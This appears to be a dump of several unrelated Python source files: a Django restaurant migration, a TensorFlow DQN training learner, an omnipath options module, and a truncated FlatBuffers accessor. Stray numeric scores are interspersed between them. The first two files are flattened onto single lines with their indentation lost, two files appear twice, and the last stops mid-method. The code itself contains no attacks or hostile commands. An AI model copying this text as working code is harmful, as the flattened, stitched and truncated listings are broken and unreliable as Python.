from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): initial = True dependencies = [ ] operations = [ migrations.CreateModel( name='MenuDetail', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('type_name', models.TextField(verbose_name='Menu Type')), ('category', models.TextField(verbose_name='Category')), ('created', models.DateTimeField(auto_now_add=True, verbose_name='created')), ('modified', models.DateTimeField(auto_now=True, verbose_name='modified')), ], options={ 'verbose_name': 'MenuType', 'verbose_name_plural': 'MenuTypes', }, ), migrations.CreateModel( name='Table', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('name', models.TextField(verbose_name='Table')), ('capacity', models.IntegerField(verbose_name='Capacity')), ('created', models.DateTimeField(auto_now_add=True, verbose_name='created')), ('modified', models.DateTimeField(auto_now=True, verbose_name='modified')), ], options={ 'verbose_name': 'Table', 'verbose_name_plural': 'Tables', }, ), migrations.CreateModel( name='Menu', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('name', models.TextField(verbose_name='Menu name')), ('quanitity', models.TextField(verbose_name='Quanitity')), ('price', models.DecimalField(decimal_places=2, max_digits=5, verbose_name='Price')), ('description', models.TextField(verbose_name='Description')), ('taste', models.TextField(verbose_name='Taste')), ('created', models.DateTimeField(auto_now_add=True, verbose_name='created')), ('modified', models.DateTimeField(auto_now=True, verbose_name='modified')), ('type', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='core.MenuDetail', verbose_name='Type')), ], options={ 'verbose_name': 'Menu', 'verbose_name_plural': 'Menu', }, ), ]
0.510496
0.140248
import os.path from typing import List, Optional, Tuple import tensorflow as tf from mlagents_envs.side_channel.engine_configuration_channel import EngineConfigurationChannel # type: ignore from mlagents_envs.side_channel.environment_parameters_channel import EnvironmentParametersChannel # type: ignore from tensorflow.keras import activations, optimizers from tensorflow.keras.layers import Layer, Concatenate, Dense from utils.config import ConfigShell from environment import Environment CONFIG_FILE = "config.csv" PROJECT_HOME = os.path.dirname(__file__) def draw_tensorboard(episode: int, time_step: int, logdir: str): writer = tf.summary.create_file_writer(logdir) with writer.as_default(): tf.summary.scalar("Duration/Episode", time_step, step=episode) class Learner: def __init__( self, agent, network, optimizer: Optional[optimizers.Optimizer] = optimizers.Adam( learning_rate=0.0001, clipnorm=10.0 ), # Parmeters for initializing the network preprocessing_layers: Optional[List[Layer]] = [ Dense(50, activation=activations.softplus) ], preprocessing_combiner: Optional[Layer] = Concatenate(axis=-1), conv_layer_params: Optional[List[Tuple[int]]] = [(8, 5, 2), (16, 3, 1)], fc_layer_params: Optional[List[int]] = None, activation_fn: Optional[Layer] = activations.softplus, ): self.agent = agent self.network = network self.optimizer = optimizer # Parmeters for initializing the network self.fc_layer_params = fc_layer_params self.preprocessing_layers = preprocessing_layers self.preprocessing_combiner = preprocessing_combiner self.conv_layer_params = conv_layer_params self.activation_fn = activation_fn def configure(self) -> Tuple[dict, str, str, str]: """ Configure the learner. Returns: config: the configuration parameters. env_file: the environment file. logdir: the log directory. savedir: the save directory. 
""" # [1] Load configuration configsh = ConfigShell(CONFIG_FILE) config, env_file, logdir, savedir = configsh.get_path(PROJECT_HOME) # [2] GPU configuration gpus = tf.config.experimental.list_physical_devices("GPU") if gpus: try: # Currently, memory growth needs to be the same across GPUs for gpu in gpus: tf.config.experimental.set_memory_growth(gpu, True) logical_gpus = tf.config.experimental.list_logical_devices("GPU") print(len(gpus), "Physical GPUs,", len(logical_gpus), "Logical GPUs") except RuntimeError as e: # Memory growth must be set before GPUs have been initialized print(e) return config, env_file, logdir, savedir def initialize_env(self, config, env_file) -> Environment: """ Initialize the environment. Args: config: the configuration parameters. env_file: the environment file. Returns: env: Environment """ # [3] Environment configuration base_port = int(input("Enter base port: ")) time_scale = int(config.get("time_scale")) width = int(config.get("width")) height = int(config.get("height")) channel_config = EngineConfigurationChannel() channel_param = EnvironmentParametersChannel() env = Environment( file_name=env_file, base_port=base_port, side_channels=[channel_config, channel_param], ) channel_config.set_configuration_parameters( time_scale=time_scale, quality_level=1, width=width, height=height ) env.set_float_parameters(config) return env def initialize_agent(self, config, env): """ Initialize the agent. Args: config: the configuration parameters. 
env: Environment Returns: agent: Agent """ # [4] Agent configuration action_spec = env.action_spec observation_spec = env.observation_spec q_network = self.initialize_network(action_spec, observation_spec) optimizer = self.optimizer agent = self.agent( observation_spec, action_spec, q_network, optimizer, epsilon=config.get("epsilon", 1.0), target_update_period=config.get("target_update_period", 5000), gamma=config.get("gamma", 0.95), reward_shaping=True if config.get("reward_shaping", True) else False, batch_size=config.get("batch_size", 12), epsilon_start=config.get("epsilon_start", 0.8), epsilon_end=config.get("epsilon_end", 0.1), exploration_steps=config.get("exploration_steps", 209000), ) return agent def initialize_network(self, action_spec, observation_spec) -> tf.keras.Model: """ Initialize the network. Args: action_spec: ActionSpec observation_spec: ObservationSpec Returns: network: Network """ preprocessing_layers = self.preprocessing_layers preprocessing_combiner = self.preprocessing_combiner conv_layer_params = self.conv_layer_params fc_layer_params = self.fc_layer_params activation_fn = self.activation_fn q_network = self.network( observation_spec, action_spec, preprocessing_layers=preprocessing_layers, preprocessing_combiner=preprocessing_combiner, conv_layer_params=conv_layer_params, fc_layer_params=fc_layer_params, activation_fn=activation_fn, ) return q_network def run(self): config, env_file, logdir, savedir = self.configure() env = self.initialize_env(config, env_file) agent = self.initialize_agent(config, env) # [5] Training max_time_step = int(config.get("max_time_step")) train_start = int(config.get("train_start", 1000)) n_episode = int(config.get("n_episode", 2000)) global_step = 0 survival_time_steps = [0] * n_episode print("Training...") for episode in range(n_episode): time_step = 0 observations, done = env.reset() while not done and time_step < max_time_step: time_step += 1 global_step += 1 debug_log = f"Episode: {episode}/{n_episode} " 
debug_log += f"Global step: {global_step} " debug_log += f"Time step: {time_step} " debug_log += f"Epsilon: {agent._epsilon:.5f} " print(debug_log, end="") action = agent.step(observations) next_observations, done = env.step(action) reward = agent.get_reward(observations, action, next_observations, done) agent.append(observations, action, reward, next_observations, done) if len(agent.memory) > train_start: agent.train() if global_step % agent._target_update_period == 0: agent.update_target_model() observations = next_observations.copy() if done: print( "Episode {} finished after {} time steps".format(episode, time_step) ) survival_time_steps[episode] = time_step draw_tensorboard(episode, time_step, logdir) if episode % 10 == 0: agent.save(f"{savedir}/ckpt_{episode}") env.close() print("Training finished") class LearnerPrev(Learner): def __init__( self, agent, network, optimizer: Optional[optimizers.Optimizer] = optimizers.Adam( learning_rate=0.0001, clipnorm=10 ), ): self.agent = agent self.network = network self.optimizer = optimizer def initialize_network(self, action_spec, observation_spec): q_network = self.network(action_spec, (64, 64, 6), (2,)) return q_network if __name__ == "__main__": pass
project/learner.py
import os.path
from typing import List, Optional, Tuple

import tensorflow as tf
from mlagents_envs.side_channel.engine_configuration_channel import EngineConfigurationChannel  # type: ignore
from mlagents_envs.side_channel.environment_parameters_channel import EnvironmentParametersChannel  # type: ignore
from tensorflow.keras import activations, optimizers
from tensorflow.keras.layers import Layer, Concatenate, Dense

from utils.config import ConfigShell
from environment import Environment

CONFIG_FILE = "config.csv"
PROJECT_HOME = os.path.dirname(__file__)

# Sentinel distinguishing "argument omitted" from an explicit ``None`` so the
# per-instance defaults below remain backward compatible with callers that
# deliberately pass ``None``.
_UNSET = object()


def draw_tensorboard(episode: int, time_step: int, logdir: str) -> None:
    """Log the survival duration of ``episode`` to TensorBoard under ``logdir``."""
    # NOTE(review): a new file writer is created on every call; if profiling
    # shows overhead, hoist the writer out of the training loop.
    writer = tf.summary.create_file_writer(logdir)
    with writer.as_default():
        tf.summary.scalar("Duration/Episode", time_step, step=episode)


class Learner:
    """Wires together environment, agent and Q-network, then runs training."""

    def __init__(
        self,
        agent,
        network,
        optimizer: Optional[optimizers.Optimizer] = None,
        # Parameters for initializing the network
        preprocessing_layers: Optional[List[Layer]] = _UNSET,
        preprocessing_combiner: Optional[Layer] = _UNSET,
        conv_layer_params: Optional[List[Tuple[int]]] = _UNSET,
        fc_layer_params: Optional[List[int]] = None,
        activation_fn: Optional[Layer] = activations.softplus,
    ):
        """
        Args:
            agent: agent factory/class, instantiated in :meth:`initialize_agent`.
            network: network factory/class, instantiated in :meth:`initialize_network`.
            optimizer: optimizer instance; a fresh ``Adam(learning_rate=1e-4,
                clipnorm=10)`` is built when omitted or ``None``.
            preprocessing_layers: per-observation preprocessing layers.
            preprocessing_combiner: layer combining the preprocessed observations.
            conv_layer_params: convolutional layer parameters for the network.
            fc_layer_params: fully-connected layer parameters for the network.
            activation_fn: activation function forwarded to the network.
        """
        self.agent = agent
        self.network = network
        # BUG FIX: the optimizer and the Keras layers used to be created once
        # at import time as default argument values, so every Learner instance
        # silently shared the same stateful objects (shared Adam slots, shared
        # Dense weights once built). Build fresh defaults per instance.
        self.optimizer = (
            optimizers.Adam(learning_rate=0.0001, clipnorm=10.0)
            if optimizer is None
            else optimizer
        )
        # Parameters for initializing the network
        self.fc_layer_params = fc_layer_params
        self.preprocessing_layers = (
            [Dense(50, activation=activations.softplus)]
            if preprocessing_layers is _UNSET
            else preprocessing_layers
        )
        self.preprocessing_combiner = (
            Concatenate(axis=-1)
            if preprocessing_combiner is _UNSET
            else preprocessing_combiner
        )
        self.conv_layer_params = (
            [(8, 5, 2), (16, 3, 1)] if conv_layer_params is _UNSET else conv_layer_params
        )
        self.activation_fn = activation_fn

    def configure(self) -> Tuple[dict, str, str, str]:
        """
        Configure the learner.

        Returns:
            config: the configuration parameters.
            env_file: the environment file.
            logdir: the log directory.
            savedir: the save directory.
        """
        # [1] Load configuration
        configsh = ConfigShell(CONFIG_FILE)
        config, env_file, logdir, savedir = configsh.get_path(PROJECT_HOME)

        # [2] GPU configuration
        gpus = tf.config.experimental.list_physical_devices("GPU")
        if gpus:
            try:
                # Currently, memory growth needs to be the same across GPUs
                for gpu in gpus:
                    tf.config.experimental.set_memory_growth(gpu, True)
                logical_gpus = tf.config.experimental.list_logical_devices("GPU")
                print(len(gpus), "Physical GPUs,", len(logical_gpus), "Logical GPUs")
            except RuntimeError as e:
                # Memory growth must be set before GPUs have been initialized
                print(e)
        return config, env_file, logdir, savedir

    def initialize_env(self, config, env_file) -> Environment:
        """
        Initialize the environment.

        Args:
            config: the configuration parameters.
            env_file: the environment file.

        Returns:
            env: Environment
        """
        # [3] Environment configuration
        base_port = int(input("Enter base port: "))
        time_scale = int(config.get("time_scale"))
        width = int(config.get("width"))
        height = int(config.get("height"))

        channel_config = EngineConfigurationChannel()
        channel_param = EnvironmentParametersChannel()
        env = Environment(
            file_name=env_file,
            base_port=base_port,
            side_channels=[channel_config, channel_param],
        )
        channel_config.set_configuration_parameters(
            time_scale=time_scale, quality_level=1, width=width, height=height
        )
        env.set_float_parameters(config)
        return env

    def initialize_agent(self, config, env):
        """
        Initialize the agent.

        Args:
            config: the configuration parameters.
            env: Environment

        Returns:
            agent: Agent
        """
        # [4] Agent configuration
        action_spec = env.action_spec
        observation_spec = env.observation_spec
        q_network = self.initialize_network(action_spec, observation_spec)
        optimizer = self.optimizer
        agent = self.agent(
            observation_spec,
            action_spec,
            q_network,
            optimizer,
            epsilon=config.get("epsilon", 1.0),
            target_update_period=config.get("target_update_period", 5000),
            gamma=config.get("gamma", 0.95),
            # bool(...) replaces the redundant ``True if ... else False``.
            reward_shaping=bool(config.get("reward_shaping", True)),
            batch_size=config.get("batch_size", 12),
            epsilon_start=config.get("epsilon_start", 0.8),
            epsilon_end=config.get("epsilon_end", 0.1),
            exploration_steps=config.get("exploration_steps", 209000),
        )
        return agent

    def initialize_network(self, action_spec, observation_spec) -> tf.keras.Model:
        """
        Initialize the network.

        Args:
            action_spec: ActionSpec
            observation_spec: ObservationSpec

        Returns:
            network: Network
        """
        q_network = self.network(
            observation_spec,
            action_spec,
            preprocessing_layers=self.preprocessing_layers,
            preprocessing_combiner=self.preprocessing_combiner,
            conv_layer_params=self.conv_layer_params,
            fc_layer_params=self.fc_layer_params,
            activation_fn=self.activation_fn,
        )
        return q_network

    def run(self):
        """Run the full training loop: configure, build env/agent, train, save."""
        config, env_file, logdir, savedir = self.configure()
        env = self.initialize_env(config, env_file)
        agent = self.initialize_agent(config, env)

        # [5] Training
        max_time_step = int(config.get("max_time_step"))
        train_start = int(config.get("train_start", 1000))
        n_episode = int(config.get("n_episode", 2000))

        global_step = 0
        survival_time_steps = [0] * n_episode
        print("Training...")
        for episode in range(n_episode):
            time_step = 0
            observations, done = env.reset()
            while not done and time_step < max_time_step:
                time_step += 1
                global_step += 1
                debug_log = f"Episode: {episode}/{n_episode} "
                debug_log += f"Global step: {global_step} "
                debug_log += f"Time step: {time_step} "
                debug_log += f"Epsilon: {agent._epsilon:.5f} "
                print(debug_log, end="")

                action = agent.step(observations)
                next_observations, done = env.step(action)
                reward = agent.get_reward(observations, action, next_observations, done)
                agent.append(observations, action, reward, next_observations, done)

                # Start training only once the replay memory holds enough samples.
                if len(agent.memory) > train_start:
                    agent.train()
                # Sync the target network on the configured period.
                if global_step % agent._target_update_period == 0:
                    agent.update_target_model()

                observations = next_observations.copy()

                if done:
                    print(
                        "Episode {} finished after {} time steps".format(episode, time_step)
                    )
                    survival_time_steps[episode] = time_step
                    draw_tensorboard(episode, time_step, logdir)

            # Periodic checkpoint every 10 episodes.
            if episode % 10 == 0:
                agent.save(f"{savedir}/ckpt_{episode}")

        env.close()
        print("Training finished")


class LearnerPrev(Learner):
    """Legacy learner kept for the previous network constructor signature."""

    def __init__(
        self,
        agent,
        network,
        optimizer: Optional[optimizers.Optimizer] = None,
    ):
        # Delegate to Learner so the optimizer default is built per instance
        # (the previous shared ``Adam`` default argument was a latent bug).
        super().__init__(agent, network, optimizer=optimizer)

    def initialize_network(self, action_spec, observation_spec):
        # Fixed input shape (64, 64, 6) and action shape (2,) of the old network.
        q_network = self.network(action_spec, (64, 64, 6), (2,))
        return q_network


if __name__ == "__main__":
    pass
0.885983
0.257888
from typing import Any, Union, ClassVar, Optional
from pathlib import Path
from urllib.parse import urlparse
import configparser

import attr

from omnipath.constants import License
from omnipath._core.cache._cache import Cache, FileCache, NoopCache, MemoryCache
from omnipath.constants._pkg_constants import DEFAULT_OPTIONS


def _is_positive(_instance, attribute: attr.Attribute, value: int) -> None:
    """Check whether the ``value`` is positive."""
    # Annotated ``None`` (not ``NoReturn``): the validator returns normally
    # whenever the value is valid.
    if value <= 0:
        raise ValueError(
            f"Expected `{attribute.name}` to be positive, found `{value}`."
        )


def _is_non_negative(_instance, attribute: attr.Attribute, value: int) -> None:
    """Check whether the ``value`` is non-negative."""
    if value < 0:
        raise ValueError(
            f"Expected `{attribute.name}` to be non-negative, found `{value}`."
        )


def _is_valid_url(_instance, _attribute, value: str) -> None:
    """Check whether the ``value`` forms a valid URL."""
    pr = urlparse(value)
    if not pr.scheme or not pr.netloc:
        raise ValueError(f"Invalid URL: `{value}`.")


def _cache_converter(value: Optional[Union[str, Path, Cache]]) -> Cache:
    """Convert ``value`` to :class:`omnipath._core.cache.Cache`."""
    if isinstance(value, Cache):
        return value
    if value is None:
        return NoopCache()
    if value == "memory":
        return MemoryCache()
    return FileCache(value)


@attr.s
class Options:
    """
    Class defining various :mod:`omnipath` options.

    Parameters
    ----------
    url
        URL of the web service.
    license
        License to use when fetching the data.
    password
        Password used when performing requests.
    cache
        Type of a cache. Valid options are:

            - `None`: do not save anything into a cache.
            - `'memory'`: cache files into the memory.
            - :class:`str`: persist files into a directory.
    autoload
        Whether to contact the server at ``url`` during import to get the server version and
        the most up-to-date query parameters and their valid options.
    convert_dtypes
        Whether to convert the data types of the resulting :class:`pandas.DataFrame`.
    num_retries
        Number of retries before giving up.
    timeout
        Timeout in seconds when awaiting response.
    chunk_size
        Size in bytes in which to read the data.
    progress_bar
        Whether to show the progress bar when downloading data.
    """

    # Location of the persisted configuration file.
    config_path: ClassVar[Path] = Path.home() / ".config" / "omnipathdb.ini"

    url: str = attr.ib(
        default=DEFAULT_OPTIONS.url,
        validator=[attr.validators.instance_of(str), _is_valid_url],
        on_setattr=attr.setters.validate,
    )
    license: Optional[License] = attr.ib(
        default=None,
        validator=attr.validators.optional(attr.validators.instance_of((str, License))),
        converter=(lambda value: None if value is None else License(value)),
        on_setattr=attr.setters.convert,
    )
    password: Optional[str] = attr.ib(
        default=None,
        repr=False,
        validator=attr.validators.optional(attr.validators.instance_of(str)),
        on_setattr=attr.setters.validate,
    )
    cache: Cache = attr.ib(
        default=DEFAULT_OPTIONS.cache_dir,
        converter=_cache_converter,
        kw_only=True,
        on_setattr=attr.setters.convert,
    )
    autoload: bool = attr.ib(
        default=DEFAULT_OPTIONS.autoload,
        validator=attr.validators.instance_of(bool),
        on_setattr=attr.setters.validate,
    )
    convert_dtypes: bool = attr.ib(
        default=DEFAULT_OPTIONS.convert_dtypes,
        validator=attr.validators.instance_of(bool),
        on_setattr=attr.setters.validate,
    )
    num_retries: int = attr.ib(
        default=DEFAULT_OPTIONS.num_retries,
        validator=[attr.validators.instance_of(int), _is_non_negative],
        on_setattr=attr.setters.validate,
    )
    timeout: Union[int, float] = attr.ib(
        default=DEFAULT_OPTIONS.timeout,
        validator=[attr.validators.instance_of((int, float)), _is_positive],
        on_setattr=attr.setters.validate,
    )
    chunk_size: int = attr.ib(
        default=DEFAULT_OPTIONS.chunk_size,
        validator=[attr.validators.instance_of(int), _is_positive],
        on_setattr=attr.setters.validate,
    )
    progress_bar: bool = attr.ib(
        default=True,
        repr=False,
        validator=attr.validators.instance_of(bool),
        on_setattr=attr.setters.validate,
    )

    def _create_config(self, section: Optional[str] = None) -> configparser.ConfigParser:
        """Build a :class:`configparser.ConfigParser` holding these options."""
        section = self.url if section is None else section
        _is_valid_url(None, None, section)

        config = configparser.ConfigParser()
        # do not save the password
        config[section] = {
            "license": str(None if self.license is None else self.license.value),
            "cache_dir": str(self.cache.path),
            "autoload": self.autoload,
            "convert_dtypes": self.convert_dtypes,
            "num_retries": self.num_retries,
            "timeout": self.timeout,
            "chunk_size": self.chunk_size,
            "progress_bar": self.progress_bar,
        }

        return config

    @classmethod
    def from_config(cls, section: Optional[str] = None) -> "Options":
        """
        Return the options from a configuration file.

        Parameters
        ----------
        section
            Section of the `.ini` file from which to create the options.
            It corresponds to the URL of the server. If `None`, use default URL.

        Returns
        -------
        :class:`omnipath._core.utils.Options`
            The options.
        """
        if not cls.config_path.is_file():
            # No config yet: persist and return the defaults.
            return cls().write()

        config = configparser.ConfigParser(default_section=DEFAULT_OPTIONS.url)
        config.read(cls.config_path)

        section = DEFAULT_OPTIONS.url if section is None else section
        _is_valid_url(None, None, section)

        # BUG FIX: a stray ``config.get(section, "cache_dir")`` (without a
        # fallback) used to raise when the option was missing, defeating the
        # ``fallback=`` on the line below. It has been removed.
        cache = config.get(section, "cache_dir", fallback=DEFAULT_OPTIONS.cache_dir)
        cache = None if cache == "None" else cache
        # ``lic`` avoids shadowing the ``license`` builtin.
        lic = config.get(section, "license", fallback=DEFAULT_OPTIONS.license)
        lic = None if lic == "None" else License(lic)

        return cls(
            url=section,
            license=lic,
            num_retries=config.getint(
                section, "num_retries", fallback=DEFAULT_OPTIONS.num_retries
            ),
            timeout=config.getfloat(
                section, "timeout", fallback=DEFAULT_OPTIONS.timeout
            ),
            chunk_size=config.getint(
                section, "chunk_size", fallback=DEFAULT_OPTIONS.chunk_size
            ),
            progress_bar=config.getboolean(
                section, "progress_bar", fallback=DEFAULT_OPTIONS.progress_bar
            ),
            autoload=config.getboolean(
                section, "autoload", fallback=DEFAULT_OPTIONS.autoload
            ),
            convert_dtypes=config.getboolean(
                section, "convert_dtypes", fallback=DEFAULT_OPTIONS.convert_dtypes
            ),
            cache=cache,
        )

    @classmethod
    def from_options(cls, options: "Options", **kwargs: Any) -> "Options":
        """
        Create new options from previous options.

        Parameters
        ----------
        options
            Options from which to create new ones.
        **kwargs
            Keyword arguments overriding attributes from ``options``.

        Returns
        -------
        The newly created option.
        """
        if not isinstance(options, Options):
            raise TypeError(
                f"Expected `options` to be of type `Options`, found `{type(options)}`."
            )

        kwargs = {k: v for k, v in kwargs.items() if hasattr(options, k)}
        return cls(**{**options.__dict__, **kwargs})

    def write(self, section: Optional[str] = None) -> "Options":
        """Write the current options to a configuration file and return ``self``."""
        # Annotated ``"Options"`` instead of the previous ``NoReturn``:
        # the method returns ``self`` for chaining.
        self.config_path.parent.mkdir(parents=True, exist_ok=True)
        with open(self.config_path, "w") as fout:
            self._create_config(section).write(fout)

        return self

    def __enter__(self) -> "Options":
        return self.from_options(self)

    def __exit__(self, exc_type, exc_val, exc_tb) -> None:
        pass


options = Options.from_config()

# BUG FIX: ``__all__`` must contain strings, not the objects themselves;
# the old ``[options, Options]`` made ``from ... import *`` raise TypeError.
__all__ = ["options", "Options"]
omnipath/_core/utils/_options.py
from typing import Any, Union, ClassVar, Optional
from pathlib import Path
from urllib.parse import urlparse
import configparser

import attr

from omnipath.constants import License
from omnipath._core.cache._cache import Cache, FileCache, NoopCache, MemoryCache
from omnipath.constants._pkg_constants import DEFAULT_OPTIONS


def _is_positive(_instance, attribute: attr.Attribute, value: int) -> None:
    """Check whether the ``value`` is positive."""
    # Annotated ``None`` (not ``NoReturn``): the validator returns normally
    # whenever the value is valid.
    if value <= 0:
        raise ValueError(
            f"Expected `{attribute.name}` to be positive, found `{value}`."
        )


def _is_non_negative(_instance, attribute: attr.Attribute, value: int) -> None:
    """Check whether the ``value`` is non-negative."""
    if value < 0:
        raise ValueError(
            f"Expected `{attribute.name}` to be non-negative, found `{value}`."
        )


def _is_valid_url(_instance, _attribute, value: str) -> None:
    """Check whether the ``value`` forms a valid URL."""
    pr = urlparse(value)
    if not pr.scheme or not pr.netloc:
        raise ValueError(f"Invalid URL: `{value}`.")


def _cache_converter(value: Optional[Union[str, Path, Cache]]) -> Cache:
    """Convert ``value`` to :class:`omnipath._core.cache.Cache`."""
    if isinstance(value, Cache):
        return value
    if value is None:
        return NoopCache()
    if value == "memory":
        return MemoryCache()
    return FileCache(value)


@attr.s
class Options:
    """
    Class defining various :mod:`omnipath` options.

    Parameters
    ----------
    url
        URL of the web service.
    license
        License to use when fetching the data.
    password
        Password used when performing requests.
    cache
        Type of a cache. Valid options are:

            - `None`: do not save anything into a cache.
            - `'memory'`: cache files into the memory.
            - :class:`str`: persist files into a directory.
    autoload
        Whether to contact the server at ``url`` during import to get the server version and
        the most up-to-date query parameters and their valid options.
    convert_dtypes
        Whether to convert the data types of the resulting :class:`pandas.DataFrame`.
    num_retries
        Number of retries before giving up.
    timeout
        Timeout in seconds when awaiting response.
    chunk_size
        Size in bytes in which to read the data.
    progress_bar
        Whether to show the progress bar when downloading data.
    """

    # Location of the persisted configuration file.
    config_path: ClassVar[Path] = Path.home() / ".config" / "omnipathdb.ini"

    url: str = attr.ib(
        default=DEFAULT_OPTIONS.url,
        validator=[attr.validators.instance_of(str), _is_valid_url],
        on_setattr=attr.setters.validate,
    )
    license: Optional[License] = attr.ib(
        default=None,
        validator=attr.validators.optional(attr.validators.instance_of((str, License))),
        converter=(lambda value: None if value is None else License(value)),
        on_setattr=attr.setters.convert,
    )
    password: Optional[str] = attr.ib(
        default=None,
        repr=False,
        validator=attr.validators.optional(attr.validators.instance_of(str)),
        on_setattr=attr.setters.validate,
    )
    cache: Cache = attr.ib(
        default=DEFAULT_OPTIONS.cache_dir,
        converter=_cache_converter,
        kw_only=True,
        on_setattr=attr.setters.convert,
    )
    autoload: bool = attr.ib(
        default=DEFAULT_OPTIONS.autoload,
        validator=attr.validators.instance_of(bool),
        on_setattr=attr.setters.validate,
    )
    convert_dtypes: bool = attr.ib(
        default=DEFAULT_OPTIONS.convert_dtypes,
        validator=attr.validators.instance_of(bool),
        on_setattr=attr.setters.validate,
    )
    num_retries: int = attr.ib(
        default=DEFAULT_OPTIONS.num_retries,
        validator=[attr.validators.instance_of(int), _is_non_negative],
        on_setattr=attr.setters.validate,
    )
    timeout: Union[int, float] = attr.ib(
        default=DEFAULT_OPTIONS.timeout,
        validator=[attr.validators.instance_of((int, float)), _is_positive],
        on_setattr=attr.setters.validate,
    )
    chunk_size: int = attr.ib(
        default=DEFAULT_OPTIONS.chunk_size,
        validator=[attr.validators.instance_of(int), _is_positive],
        on_setattr=attr.setters.validate,
    )
    progress_bar: bool = attr.ib(
        default=True,
        repr=False,
        validator=attr.validators.instance_of(bool),
        on_setattr=attr.setters.validate,
    )

    def _create_config(self, section: Optional[str] = None) -> configparser.ConfigParser:
        """Build a :class:`configparser.ConfigParser` holding these options."""
        section = self.url if section is None else section
        _is_valid_url(None, None, section)

        config = configparser.ConfigParser()
        # do not save the password
        config[section] = {
            "license": str(None if self.license is None else self.license.value),
            "cache_dir": str(self.cache.path),
            "autoload": self.autoload,
            "convert_dtypes": self.convert_dtypes,
            "num_retries": self.num_retries,
            "timeout": self.timeout,
            "chunk_size": self.chunk_size,
            "progress_bar": self.progress_bar,
        }

        return config

    @classmethod
    def from_config(cls, section: Optional[str] = None) -> "Options":
        """
        Return the options from a configuration file.

        Parameters
        ----------
        section
            Section of the `.ini` file from which to create the options.
            It corresponds to the URL of the server. If `None`, use default URL.

        Returns
        -------
        :class:`omnipath._core.utils.Options`
            The options.
        """
        if not cls.config_path.is_file():
            # No config yet: persist and return the defaults.
            return cls().write()

        config = configparser.ConfigParser(default_section=DEFAULT_OPTIONS.url)
        config.read(cls.config_path)

        section = DEFAULT_OPTIONS.url if section is None else section
        _is_valid_url(None, None, section)

        # BUG FIX: a stray ``config.get(section, "cache_dir")`` (without a
        # fallback) used to raise when the option was missing, defeating the
        # ``fallback=`` on the line below. It has been removed.
        cache = config.get(section, "cache_dir", fallback=DEFAULT_OPTIONS.cache_dir)
        cache = None if cache == "None" else cache
        # ``lic`` avoids shadowing the ``license`` builtin.
        lic = config.get(section, "license", fallback=DEFAULT_OPTIONS.license)
        lic = None if lic == "None" else License(lic)

        return cls(
            url=section,
            license=lic,
            num_retries=config.getint(
                section, "num_retries", fallback=DEFAULT_OPTIONS.num_retries
            ),
            timeout=config.getfloat(
                section, "timeout", fallback=DEFAULT_OPTIONS.timeout
            ),
            chunk_size=config.getint(
                section, "chunk_size", fallback=DEFAULT_OPTIONS.chunk_size
            ),
            progress_bar=config.getboolean(
                section, "progress_bar", fallback=DEFAULT_OPTIONS.progress_bar
            ),
            autoload=config.getboolean(
                section, "autoload", fallback=DEFAULT_OPTIONS.autoload
            ),
            convert_dtypes=config.getboolean(
                section, "convert_dtypes", fallback=DEFAULT_OPTIONS.convert_dtypes
            ),
            cache=cache,
        )

    @classmethod
    def from_options(cls, options: "Options", **kwargs: Any) -> "Options":
        """
        Create new options from previous options.

        Parameters
        ----------
        options
            Options from which to create new ones.
        **kwargs
            Keyword arguments overriding attributes from ``options``.

        Returns
        -------
        The newly created option.
        """
        if not isinstance(options, Options):
            raise TypeError(
                f"Expected `options` to be of type `Options`, found `{type(options)}`."
            )

        kwargs = {k: v for k, v in kwargs.items() if hasattr(options, k)}
        return cls(**{**options.__dict__, **kwargs})

    def write(self, section: Optional[str] = None) -> "Options":
        """Write the current options to a configuration file and return ``self``."""
        # Annotated ``"Options"`` instead of the previous ``NoReturn``:
        # the method returns ``self`` for chaining.
        self.config_path.parent.mkdir(parents=True, exist_ok=True)
        with open(self.config_path, "w") as fout:
            self._create_config(section).write(fout)

        return self

    def __enter__(self) -> "Options":
        return self.from_options(self)

    def __exit__(self, exc_type, exc_val, exc_tb) -> None:
        pass


options = Options.from_config()

# BUG FIX: ``__all__`` must contain strings, not the objects themselves;
# the old ``[options, Options]`` made ``from ... import *`` raise TypeError.
__all__ = ["options", "Options"]
0.944203
0.239572
# namespace: FBOutput

# NOTE(review): this module follows the FlatBuffers-generated accessor pattern
# (vtable offset lookups, Prepend*Slot builder helpers) -- presumably emitted
# by `flatc` from a schema; prefer regenerating over hand-editing.

import tdw.flatbuffers


class AvatarSimpleBody(object):
    """Read-side accessor for the ``AvatarSimpleBody`` FlatBuffers table."""

    __slots__ = ['_tab']

    @classmethod
    def GetRootAsAvatarSimpleBody(cls, buf, offset):
        # Resolve the root table position inside ``buf`` and wrap it.
        n = tdw.flatbuffers.encode.Get(tdw.flatbuffers.packer.uoffset, buf, offset)
        x = AvatarSimpleBody()
        x.Init(buf, n + offset)
        return x

    # AvatarSimpleBody
    def Init(self, buf, pos):
        # Attach a table view over the underlying byte buffer.
        self._tab = tdw.flatbuffers.table.Table(buf, pos)

    # AvatarSimpleBody
    def Id(self):
        # vtable slot 4: avatar id string; None when the field is absent.
        o = tdw.flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(4))
        if o != 0:
            return self._tab.String(o + self._tab.Pos)
        return None

    # AvatarSimpleBody
    def Position(self):
        # vtable slot 6: inline Vector3 struct; None when absent.
        o = tdw.flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(6))
        if o != 0:
            x = o + self._tab.Pos
            from .Vector3 import Vector3
            obj = Vector3()
            obj.Init(self._tab.Bytes, x)
            return obj
        return None

    # AvatarSimpleBody
    def Rotation(self):
        # vtable slot 8: inline Quaternion struct; None when absent.
        o = tdw.flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(8))
        if o != 0:
            x = o + self._tab.Pos
            from .Quaternion import Quaternion
            obj = Quaternion()
            obj.Init(self._tab.Bytes, x)
            return obj
        return None

    # AvatarSimpleBody
    def Forward(self):
        # vtable slot 10: inline Vector3 struct; None when absent.
        o = tdw.flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(10))
        if o != 0:
            x = o + self._tab.Pos
            from .Vector3 import Vector3
            obj = Vector3()
            obj.Init(self._tab.Bytes, x)
            return obj
        return None

    # AvatarSimpleBody
    def Velocity(self):
